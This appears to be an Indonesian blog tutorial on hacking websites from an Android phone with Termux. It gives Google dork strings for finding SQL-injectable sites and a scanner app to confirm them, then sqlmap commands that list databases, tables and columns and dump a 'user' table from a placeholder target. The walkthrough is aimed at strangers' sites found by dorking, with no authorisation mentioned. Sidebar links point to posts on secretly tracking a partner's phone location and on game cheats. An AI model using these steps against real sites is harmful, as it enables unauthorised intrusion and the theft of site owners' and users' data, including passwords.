Menu Tutup

Cara Mencari Bug Website di Hp Android Termux

Dalam tutorial kali ini kita akan membahas bagaimana cara mencari celah atau bug website di Hp Android tanpa root.

Bug, merupakan suatu kesalahan atau cacat pada sebuah software atau hardware yang menyebabkan software atau hardware tersebut tidak jalan sebagaimana mestinya.

Mencari Website yang Vulnerability

Ada beberapa tool yang dapat di gunakan untuk menemuka web yang vuln. dalam tutorial ini saya akan menggunakan Google Dork dan tool Droidbug QSL.

Oke langsung ke tahap pertama:

1. Buka web broser kalian dan masukan Dork di bawah ini di menu pencarian browser:

  • add.php?bookid=
  • add_cart.php?num=
  • addcart.php?
  • addItem.php
  • add-to-cart.php?ID=
  • inurl:gallery.php?id=
  • about.php?cartID=
  • accinfo.php?cartId=
  • acclogin.php?cartID=

Maka akan tampil beberapa website yang Vulnerability.

2. Langkah selanjutnya kita akan menguji apakah web tersebut benar2 vulnerability atau terdapat celah keamanannya:

  • Download dan instal aplikasi Droidbus QSL di Hp Android Anda.
  • Setelah terinstal, buka dan pilih menu By URL,s maka akan muncul kolom untuk memasukan link.
  • Copy dan paste link website yang kamu dapat tadi di browser kamu dari Google Dork dan klik SCAN. Biarka proses scaning selesai, jika vuln maka akan ada keterangan Vulnerability berwarna hijau.
BACA JUGA  Cara Cheat Map Dron View Mobile Legend

Oke, kita lanjut ke Langkah selanjutnya:

SQL Injection Menggunakan SQLmap

Sqlmap adalah perangkat lunak open source. Sqlmap adalah salah satu tool pengujian penetrasi paling kuat yang tersedia di internet. Ini adalah salah satu alat favorit saya dan dikodekan dengan python. Anda dapat menggunakan sqlmap untuk mengeksploitasi dan mengekstrak informasi database dari situs web yang rentan SQL.

Cara mengunduh dan menginstal Sqlmap di Android Termux

Persyaratan

Termux:
Download Link
Hacker Keyboard
Download Link

  • Sqlmap GitHub
    https://github.com/sqlmapproject/sqlmap.git

Prosedur

1: Buka Termux dan ketik perintah pkg update dan tekan Enter.
  • Sekarang instal Python2 dengan perintah pkg install python2 dan tekan Enter
  • Instal git dengan perintah pkg install git
2: Sekarang kita akan mengkloning Sqlmap
  • Ketik perintah git clone https://github.com/sqlmapproject/sqlmap.git dan tekan Enter
  • Tunggu hingga download selesai (59MB). Pastikan Anda memiliki koneksi internet yang baik dan stabil kecuali ada kesalahan. Setelah selesai mengunduh.
BACA JUGA  Cara Lacak Lokasi HP Pacar menggunakan Seeker
3: Setelah menyelesaikan pengunduhan
  • Ketik perintah ls untuk melihat daftar file yang tersedia di sana.
  • Ketik perintah cd sqlmap dan tekan Enter. Sekarang Anda berada di direktori sqlmap
  • Ketik perintah ls untuk melihat daftar file yang tersedia di sana.
4: Sekarang kita akan menginstal Sqlmap
  • Ketikkan perintah python2 sqlmap.py
5: Bagaimana cara menggunakan?
  • Ketik perintah python2 sqlmap.py -u (url) dan tekan Enter. Di sini (url) adalah tautan atau situs web Anda. Dalam tangkapan layar ini saya akan mengujinya di situs web saya sendiri.

6. Mencari Celah atau Bug Website

Sampai pada bagian untuk menemukan sebuak bug website.

Ada beberapa perintah SQLMap untuk menemukan data penting website yang akan kita xploit:

  1.  “–dbs” untuk menemukan database tertentu. untuk menjalankannya cukup masukan perintah $ python2 sqlmap.py -u “http://www.webtarget.com/section.php?id=51” –dbs
  2. –tables” dan “-D“membuka tabel yang ada dalam database. contoh: $ python2 sqlmap.py -u “http://www.webtarget.com/section.php?id=51” –tables -D namawwbtarget
  3. –colums” untuk mendapatkan kolom sebuah tabel misalnya berisi : id, password, text dll. $ python2 sqlmap.py -u “http://www.webtarget.com/section.php?id=51” –columns -D namawebtarget -T user
  4. “–dump”, “-D” dan “-T” untuk membuka data yang ada dalam tabel. masukanbperintah ini “contoh:” $ python sqlmap.py -u “http://www.webtarget.com/section.php?id=51” –dump -D namawbtarget -T user

Ok, sekian tutorial cara mencari kerentanan situs atau bug sebuah website dari saya. mohon ma’af jika ada kesalahan, jangan sungkan untuk berkomentar. trimakasih!

BACA JUGA  Tools hacking terbaik 2020

Tinggalkan Balasan